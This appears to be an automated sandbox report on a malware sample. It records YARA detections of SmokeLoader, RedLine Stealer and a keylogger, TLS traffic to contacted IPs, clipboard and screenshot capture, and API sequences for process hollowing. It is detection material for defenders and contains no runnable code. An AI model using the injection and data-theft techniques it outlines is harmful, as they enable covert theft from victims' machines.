Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 52677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52662
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52663
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52661
Source: unknown	Network traffic detected: HTTP traffic on port 52660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52664
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52665
Source: unknown	Network traffic detected: HTTP traffic on port 52688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

6_2_0042EAB0

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

6_2_0042EAB0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

6_2_0042EC90

Yara detected Keylogger Generic

Source: Yara match	File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401615
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401658
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401620
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401524
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040162D
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401635
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401615
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401658
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401620
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401524
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040162D
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401635
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_04299B10 NtProtectVirtualMemory,NtProtectVirtualMemory,	8_2_04299B10
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	8_2_0429A4F0
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_04299850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	8_2_04299850
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	9_2_6D0C62C0

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00427353	6_2_00427353
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004016E0	6_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00420880	6_2_00420880
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00404970	6_2_00404970
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0041FD10	6_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0043B050	6_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00426174	6_2_00426174
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004061F0	6_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00426284	6_2_00426284
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004223B8	6_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00405440	6_2_00405440
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0040F400	6_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004164D2	6_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00433480	6_2_00433480
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00403570	6_2_00403570
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00421580	6_2_00421580
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004067B0	6_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004089A0	6_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00424B80	6_2_00424B80
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00421C71	6_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00425CEE	6_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00440D36	6_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0043AD30	6_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00407DF0	6_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00404EF0	6_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00435EB0	6_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00403F80	6_2_00403F80
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F1267	6_2_020F1267
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0212B2B7	6_2_0212B2B7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021163DB	6_2_021163DB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F8057	6_2_020F8057
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02112067	6_2_02112067
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02126117	6_2_02126117
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F5157	6_2_020F5157
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F41E7	6_2_020F41E7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020FF667	6_2_020FF667
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F56A7	6_2_020F56A7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021236E7	6_2_021236E7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02106739	6_2_02106739
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F37D7	6_2_020F37D7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F6457	6_2_020F6457
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021164EB	6_2_021164EB
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_021175BA	6_2_021175BA
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02110AE7	6_2_02110AE7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F4BD7	6_2_020F4BD7
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_02115F55	6_2_02115F55
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0212AF97	6_2_0212AF97
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F8C07	6_2_020F8C07
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429AB10	8_2_0429AB10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9ECD0	9_2_6CF9ECD0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C8D20	9_2_6D0C8D20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF3ECC0	9_2_6CF3ECC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D06AD50	9_2_6D06AD50
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00ED70	9_2_6D00ED70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4AC60	9_2_6CF4AC60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0CCDC0	9_2_6D0CCDC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D006C00	9_2_6D006C00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01AC30	9_2_6D01AC30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF44DB0	9_2_6CF44DB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD6D90	9_2_6CFD6D90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080F20	9_2_6D080F20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4AEC0	9_2_6CF4AEC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE0EC0	9_2_6CFE0EC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC6E90	9_2_6CFC6E90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D002F70	9_2_6D002F70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDEE70	9_2_6CFDEE70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D088FB0	9_2_6D088FB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01EFF0	9_2_6D01EFF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF40FE0	9_2_6CF40FE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D020E20	9_2_6D020E20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4EFB0	9_2_6CF4EFB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFAEF40	9_2_6CFAEF40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF46F10	9_2_6CF46F10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0009B0	9_2_6D0009B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF90820	9_2_6CF90820
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCA820	9_2_6CFCA820
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D05C9E0	9_2_6D05C9E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF749F0	9_2_6CF749F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D014840	9_2_6D014840
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD09A0	9_2_6CFD09A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFA9A0	9_2_6CFFA9A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF78960	9_2_6CF78960
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D02C8C0	9_2_6D02C8C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0468E0	9_2_6D0468E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF96900	9_2_6CF96900
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFBEA80	9_2_6CFBEA80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFBCA70	9_2_6CFBCA70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF8A30	9_2_6CFF8A30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D02EBD0	9_2_6D02EBD0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D046BE0	9_2_6D046BE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D044BE0	9_2_6D044BE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFEEA00	9_2_6CFEEA00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE0BA0	9_2_6CFE0BA0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D040AC0	9_2_6D040AC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF864D0	9_2_6CF864D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDA4D0	9_2_6CFDA4D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D044540	9_2_6D044540
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D088550	9_2_6D088550
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF58460	9_2_6CF58460
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCA430	9_2_6CFCA430
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA4420	9_2_6CFA4420
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00A5E0	9_2_6D00A5E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCE5F0	9_2_6CFCE5F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF345B0	9_2_6CF345B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D06A480	9_2_6D06A480
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE0570	9_2_6CFE0570
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA2560	9_2_6CFA2560
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF98540	9_2_6CF98540
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9E6E0	9_2_6CF9E6E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDE6E0	9_2_6CFDE6E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF646D0	9_2_6CF646D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9C650	9_2_6CF9C650
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF6A7D0	9_2_6CF6A7D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC0700	9_2_6CFC0700
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D024130	9_2_6D024130
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF500B0	9_2_6CF500B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF38090	9_2_6CF38090
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF8E070	9_2_6CF8E070
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00C000	9_2_6D00C000
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D008010	9_2_6D008010
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF401E0	9_2_6CF401E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01C0B0	9_2_6D01C0B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA8140	9_2_6CFA8140
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFB6130	9_2_6CFB6130
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D05C360	9_2_6D05C360
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D082370	9_2_6D082370
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC8260	9_2_6CFC8260
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD8250	9_2_6CFD8250
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00A210	9_2_6D00A210
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF943E0	9_2_6CF943E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D018220	9_2_6D018220
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9E3B0	9_2_6CF9E3B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF723A0	9_2_6CF723A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF42370	9_2_6CF42370
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD6370	9_2_6CFD6370
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0122A0	9_2_6D0122A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D00E2B0	9_2_6D00E2B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF48340	9_2_6CF48340
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C62C0	9_2_6D0C62C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFB2320	9_2_6CFB2320
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDFC80	9_2_6CFDFC80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D089D90	9_2_6D089D90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF43C40	9_2_6CF43C40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D011DC0	9_2_6D011DC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF51C30	9_2_6CF51C30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D069C40	9_2_6D069C40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D04DC60	9_2_6D04DC60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF33D80	9_2_6CF33D80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D07DCD0	9_2_6D07DCD0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D001CE0	9_2_6D001CE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA3D00	9_2_6CFA3D00
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D097F20	9_2_6D097F20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D043F30	9_2_6D043F30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF63EC0	9_2_6CF63EC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D05DFC0	9_2_6D05DFC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C3FC0	9_2_6D0C3FC0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFEBFF0	9_2_6CFEBFF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D04DE10	9_2_6D04DE10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF61F90	9_2_6CF61F90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C5E60	9_2_6D0C5E60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D09BE70	9_2_6D09BE70
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF35F30	9_2_6CF35F30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF75F20	9_2_6CF75F20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D08F900	9_2_6D08F900
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF4D8E0	9_2_6CF4D8E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF738E0	9_2_6CF738E0
